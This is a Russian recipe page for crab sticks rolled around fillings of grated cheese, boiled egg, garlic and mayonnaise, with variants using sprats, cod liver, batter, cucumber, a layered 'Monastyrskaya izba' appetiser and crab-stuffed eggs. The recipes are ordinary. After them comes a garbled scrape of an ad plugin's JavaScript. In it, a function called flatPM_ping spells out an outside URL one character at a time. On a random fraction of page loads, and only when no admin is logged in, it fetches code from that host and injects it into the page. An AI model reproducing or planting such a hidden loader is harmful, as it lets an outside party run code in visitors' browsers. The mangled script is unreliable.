Крабовые палочки, фаршированные сыром и яйцом рецепт

Крабовые палочки, фаршированные различными начинками из недорогих продуктов

Крабовые палочки являются очень популярным продуктом. Его в основном используют для приготовления различных закусок. Для праздничного стола этот ингредиент незаменим.

Вкус блюда во многом зависит от качества палочек. Отдавайте предпочтение проверенным производителям и покупателям. Обязательно обращайте внимание на состав. В первой строчке должно быть указано количество рыбного фарша – сурими. Если он после остальных компонентов, то от этого продукта следует отказаться.

Крабовые палочки можно фаршировать к празднику самыми разными начинками. Сегодня в статье рассмотрим несколько простых и вкусных рецептов приготовления. Такой закуской вы разнообразите новогоднее меню.

Крабовые палочки, фаршированные сыром, чесноком и яйцом

Бюджетный вариант праздничной закуски. Для приготовления нам понадобятся недорогие продукты, которые отлично сочетаются друг с другом, создавая неповторимый вкус.

Ингредиенты:

  • 1 упаковка крабовых палочек;
  • 100 г сыра твердых сортов;
  • 1 зубчик чеснока;
  • 2 яйца;
  • 100 г майонеза.

Приготовление:

  1. Нам понадобятся качественные крабовые палочки со слоистой структурой. При необходимости размораживаем и оставляем при комнатной температуре. Затем слегка надавливаем и разворачиваем. Если не получается, то на 5 минут отправляем в кастрюлю с теплой водой;
  2. Сыр, чеснок и вареные яйца измельчаем на терке;
  3. Заправляем майонезом и перемешиваем;
  4. Начинку выкладываем на развернутые палочки, а затем сворачиваем их в рулеты;
  5. Убираем в холодильник на пару часов.

Для красивой подачи разрезаем закуску пополам, устанавливаем на тарелку и украшаем зеленью!

Пошаговый рецепт фаршированных крабовых палочек со шпротами, яйцом и сыром

Холодная закуска быстрого приготовления не останется без внимания. А готовится она из продуктов, которые мы приобретаем на любые праздники. Берите на заметку простой рецепт.

Ингредиенты:

  • 500 г крабовых палочек;
  • 1 банка шпрот;
  • 4 яйца;
  • 2 ст.л плавленого сыра;
  • 1 зубчик чеснока;
  • 2 ст.л майонеза;
  • Зелень.

Приготовление:

  1. Чтобы палочки хорошо разворачивались, они должны быть качественными и полностью размороженными;
  2. Для приготовления начинки в миске смешиваем тертые яйца, рубленый укроп, плавленый сыр, майонез и чеснок, пропущенный через пресс;
  3. Внутреннюю часть крабовых палочек смазываем приготовленной массой;
  4. С одного края выкладываем две рыбки, чтобы хвостики торчали с двух сторон;
  5. Сворачиваем в рулет и разрезаем на две половинки.

На тарелку выкладываем листья салата и распределяем закуску. Аналогичным способом можно сделать роллы. Для этого просто не добавляем шпроты, а рулеты разрезаем на небольшие кусочки.

Очень вкусный рецепт крабовых палочек, фаршированных печенью трески

Еще один замечательный вариант закуски для праздничного стола и обычного дня. Это быстрый рецепт на скорую руку, поэтому может выручить, когда неожиданно пришли гости.

Ингредиенты:

  • 1 упаковка крабовых палочек;
  • 1 банка печени трески;
  • 3 яйца;
  • Соль и перец по вкусу.

Приготовление:

  1. Печень с небольшим количеством масла перекладываем в миску и разминаем при помощи вилки;
  2. Добавляем тертые вареные яйца и перемешиваем;
  3. Палочки отправляем в кастрюлю с теплой водой на несколько минут. После этого они легко разворачиваются;
  4. С внутренней стороны выкладываем начинку и аккуратно скручиваем.

Подаем в тарелке с листьями салата. Печень можете заменить любыми консервами, которые вам больше всего нравятся.

Фаршированные крабовые палочки «Монастырская изба»

Если вы хотите удивить гостей своим праздничным столом, то приготовьте закусочный торт, который называется «Монастырская изба». Он не только эффектно смотрится, но и получается очень вкусным.

Ингредиенты:

  • 350 г крабовых палочек;
  • 2 яйца;
  • 200 г сыра твердых сортов;
  • 2 зубчика чеснока;
  • Петрушка;
  • 250 г домашнего майонеза.

Приготовление:

  1. Сыр натираем на мелкой терке и перекладываем в глубокую миску. Немного оставляем для оформления;
  2. В тарелку добавляем прессованный чеснок и рубленую петрушку;
  3. Из яиц извлекаем желтки и откладываем в сторону. Белки мелко нарезаем и отправляем в начинку;
  4. Заправляем майонезом и перемешиваем;
  5. Разворачиваем крабовые палочки. По внутренней стороне равномерно распределяем приготовленную массу и сворачиваем;
  6. Дно красивой тарелки смазываем тонким слоем майонеза, посыпаем рубленой петрушкой или зеленым луком;
  7. В один ряд выкладываем 5 палочек и промазываем майонезом;
  8. Во втором слое будет 4 палочки, таким образом, формируем пирамиду. То есть нам понадобятся 15 крабовых палочек;
  9. Верхний слой смазываем майонезом, посыпаем сыром, смешанным с тертыми желтками.

Закуску убираем в холодильник на несколько часов. Приятного аппетита!

Крабовые палочки, фаршированные в кляре с сыром и чесноком

Предлагаю вам воспользоваться необычным рецептом приготовления вкусной закуски. Ее готовят как в обычные дни для перекуса, так и для праздничного стола.

Ингредиенты:

  • Крабовые палочки;
  • 50 г сыра;
  • 2 зубчика чеснока;
  • Майонез;
  • 1 яйцо;
  • 1 ст.л с горкой муки.

Приготовление:

  1. Для приготовления начинки в миску отправляем натертый сыр и чеснок. Смешиваем с майонезом;
  2. В отдельную тарелку разбиваем яйцо, добавляем муку и перемешиваем;
  3. Включаем плиту и в сковороде разогреваем растительное масло;
  4. Тем временем разворачиваем крабовые палочки, и на внутреннюю часть наносим начинку, после чего аккуратно заворачиваем;
  5. Закуску макаем в кляр и выкладываем на сковороду;
  6. Обжариваем со всех сторон.

В качестве начинки можете использовать и другие продукты. Поэтому экспериментируйте, если есть время.

Простой рецепт фаршированных крабовых палочек с плавленым сыром и огурцом

Предлагаю вам еще один интересный вариант закуски. Для приготовления нам понадобятся недорогие и доступные продукты, которые перед праздником есть в каждом холодильнике.

Ингредиенты:

  • 10 крабовых палочек;
  • 2 плавленых сырка;
  • 1 огурец;
  • 2 зубчика чеснока;
  • 2 яичных белка;
  • 2 ст.л майонеза.

Приготовление:

  1. Заранее варим яйца вкрутую, а сырки убираем в морозилку на несколько минут;
  2. В миске смешиваем тертые белки, сыр, а также чеснок, пропущенный через специальный пресс;
  3. Заправляем майонезом и перемешиваем;
  4. Огурец очищаем от кожуры и нарезаем на тонкие брусочки;
  5. Разворачиваем размороженные крабовые палочки, равномерно распределяем начинку, а сверху выкладываем огурцы;
  6. Аккуратно заворачиваем и убираем в морозильную камеру на 30 минут;
  7. После чего нарезаем на небольшие кусочки.

Закуска готова, и ее сразу можно подавать к столу. Приятного аппетита!

В подборке собраны самые популярные рецепты. Но вы можете использовать в качестве начинки фарш, обжаренные грибы с луком, икру мойвы и другие ингредиенты.

Яйца фаршированные крабовыми палочками и сыром

Простая и быстрая закуска, когда гости уже на пороге! Оригинальная закуска для праздничного стола. Фаршированные яйца – это всегда беспроигрышный вариант. Фаршировать яйца можно любой начинкой. Яйца очень хорошо сочетаются с рыбой, икрой, печенью трески и любимыми всеми крабовыми палочками.

  1. Главная
  2. Лучшие рецепты
  3. Категории рецепта
  4. Яйца фаршированные крабовыми палочками и сыром

Ингредиенты и как готовить

ингредиенты на 6 порций или – количество продуктов для нужных вам порций будет подсчитано автоматически!’>

Всего:

Вес состава: 100 гр
Калорийность
состава:
226 ккал
Белков: 11 гр
Жиров: 19 гр
Углеводов: 3 гр
Б/Ж/У: 33 / 58 / 9
Н 100 / С 0 / В 0

Время приготовления: 20 мин

способ приготовления

Предлагаю Вашему вниманию рецепт яиц, фаршированных крабовыми палочками и сыром:

1. Берем отборные яйца либо большие яйца первого сорта и отвариваем их вкрутую. Чтобы яйца сварились в крутую, но не переварились и желток внутри не приобрел синий оттенок, яйца нужно варить ровно 7 минут после закипания воды. А чтобы яйца хорошо чистились, приварке в воду необходимо добавить соду на кончике ножа.

2. Отваренные в крутую яйца очищаем от скорлупы, разрезаем на половинки и достаем желток. Желток откладываем, он потом пригодится нам для начинки.

3. Займемся начинкой. Натираем крабовые палочки (крабовое мясо) на мелкой терке. Чтобы было легче натирать крабовые палочки, их нужно немного подморозить в морозильной камере холодильника.

4. Твердый сыр также натираем на самой мелкой терке. В начинку можно добавлять любой сыр, не обязательно твердый, а еще вкуснее сочетание из нескольких видов сыра. Можно добавить плавленный сырок по желанию или даже пару ложек мягкого плавленного сыра типа “Янтарь” (тогда и майонез может не понадобиться).

5. Желтки от вареных яиц разминаем вилкой.

6. Чеснок выдавливаем при помощи чеснокодавки либо натираем на мелкой терке. Если Вы не любите чеснок, то можно его не добавлять. Без чеснока получается тоже очень вкусно, но чеснок придает приятную остроту.

7. Теперь соединяем натертые сыр, крабовые палочки, желтки яиц, чеснок. Солим и перчим по вкусу. Добавляем немного майонеза для связки и хорошо перемешиваем. Еще в начинку по желанию можно добавить немного нарезанного укропа.

8. Маленькой ложечкой начиняем половинки белков получившейся начинкой.

9. Для украшения фаршированных яиц нарезаем оливки колечками. На каждую половинку яйца выкладываем по колечку оливки. Украшаем наши яйца фаршированные крабовыми палочками и сыром веточками укропа.

Приятного аппетита и новых кулинарных успехов!

Фаршированные крабовые палочки

В последнее время все чаще на прилавках магазинов стали появляться крабовые палочки очень хорошего качества, из белой морской рыбы. Удовольствие это недешевое, но если любите их, то изредка можно и побаловать домашних интересными блюдами, приготовленными из этого продукта. Мы же сегодня будем готовить уже ставшую классической закуску на праздничных столах многих семей – фаршированные крабовые палочки с сыром и яйцом.

Ингредиенты

Подготовьте все продукты по списку. Первым делом поставьте вариться куриные яйца. Варите их после закипания воды не дольше 10 минут. Яйца остудите в холодной воде, очистите от скорлупы.

Укроп помойте, обсушите. Если палочки замороженные, то их следует предварительно разморозить. Плавленый сырок и твердый сыр возьмите своего любимого производителя.

В любую удобную посуду натрите твердый и плавленый сыры на терке, не имеет значения на какой – крупной или мелкой.

Добавьте к сырной массе точно так же измельченные куриные яйца, рубленый укроп, пропущенный через пресс чеснок. Заправьте начинку вкусным майонезом, свежемолотым черным перцем и, при желании, солью. Смешайте смесь до однородного состояния, попробуйте на вкус.

Палочки очистите от пленки, аккуратно разверните их, смажьте внутреннюю сторону полной столовой ложкой приготовленной ранее начинки.

И снова аккуратно сверните обратно рулетиком. То же самое проделайте с остальными продуктами. Поставьте приготовленные рулетики в холодильник.

Перед подачей разрежьте каждую палочку пополам наискосок для удобства и более презентабельного вида.

Блюдо, на котором планируете подавать закуску, украсьте листовым салатом. Переложите на него фаршированные крабовые палочки и несите на праздничный стол.

Очень часто делаю фаршированные крабовые рулетики. Начинку можно делать разнообразной, все что есть в холодильнике, можно использовать. Ветчина, колбаса,сардельки, вареное мясо, яйца, жареные грибы, зелень и тд. Если ребенок есть, лучше использовать сметану, а не майонез. И еще, перед тем, как разворачивать палочки, я опускаю их на минутку в теплую воду, тогда они разворачиваются без проблем и не рвутся. Становятся более пластичными.

Крабовые палочки фаршированные сыром, чесноком и яйцом

Крабовые палочки – часто встречаемый ингредиент в рецептах салатов и холодных закусок. В большинстве случаев их предлагают просто измельчить и добавить в блюдо. Однако этот продукт может выступать и в роли самостоятельного блюда. Удивите гостей быстрой закуской – приготовьте рулетики из крабовых палочек, нафаршировав их тертыми яйцами, сыром, чесноком и зеленью.

Фаршированные крабовые палочки могут выступать как в роли закуски, так и в качестве основного блюда. Состав начинки можно менять по своему усмотрению. Вместо яиц можно использовать отварную печень трески или любой паштет.

Как приготовить крабовые палочки фаршированные сыром и яйцом

Крабовые палочки необходимо предварительно разморозить, так как для приготовления фаршированных рулетиков их придется развернуть. Если продукт будет даже слегка подстывшим, сделать это не получится.

Совет к рецепту:

Крабовые палочки некоторых производителей очень тяжело развернуть – они начинают ломаться и трескаться. Чтобы этого не происходило, после окончания разморозки следует на несколько секунд погрузить их в кипяток. После этого палочки легко развернутся и не будут крошиться.

Ингредиенты

  • Крабовые палочки (в упаковке 12 штук) — 1 пачка;
  • Яйца сваренные вкрутую — 3 шт.;
  • Петрушка — половина пучка;
  • Чеснок — 2 зубка;
  • Майонез;
  • Соль по вкусу;
  • Твердый плавленный сыр — 100 гр.

Приготовление фаршированных крабовых палочек

Шаг 1.

Вымыть, высушить и мелко нарезать зелень петрушки, предварительно удалив стебли.

Шаг 2.

Натереть сыр. Лучше всего сделать это на средней терке.

Шаг 3.

Продавить чеснок через чеснокодавку и смешать полученную мякоть с тертым сыром. При отсутствии чеснокодавки натереть зубки чеснока на самой мелкой терке.

Шаг 4.

Вареные яйца очистить и измельчить на средней терке.

Шаг 5.

Смешать зелень, сыр с чесноком и яйца в отдельной чашке, добавить 2 ст. ложки майонеза и немного соли по вкусу. Перемешать.

Шаг 6.

Развернуть крабовую палочку, расправить ее на блюдце и смазать приготовленной начинкой. Аккуратно закрутить палочку обратно в рулетик.

Начинить таким способом все остальные крабовые палочки. После этого отправить их в холодильник на полчаса. Подавать к столу желательно охлажденными.

Крабовые палочки фаршированные сыром, чесноком и яйцом готовы. Приятного аппетита!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};